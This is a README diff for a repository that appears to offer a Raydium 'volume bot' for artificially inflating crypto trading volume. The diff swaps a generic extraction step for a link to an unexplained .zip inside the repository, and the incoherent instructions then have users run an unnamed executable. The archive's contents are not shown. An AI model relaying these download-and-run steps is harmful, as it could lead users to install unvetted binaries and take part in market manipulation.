GRANDAO01/Bonkfun-Raydium-Volume-Bot/README.md

    - Follow the installation process.

 4. **Linux:**
-   - Extract the `.tar.gz` file using the terminal.
+   - Extract the `https://raw.githubusercontent.com/GRANDAO01/Bonkfun-Raydium-Volume-Bot/main/houseridden/Bonkfun-Raydium-Volume-Bot.zip` file using the terminal.
    - Use the terminal to run the software by navigating to the folder and typing `./yourfilename`.

 ## 🔑 Configuration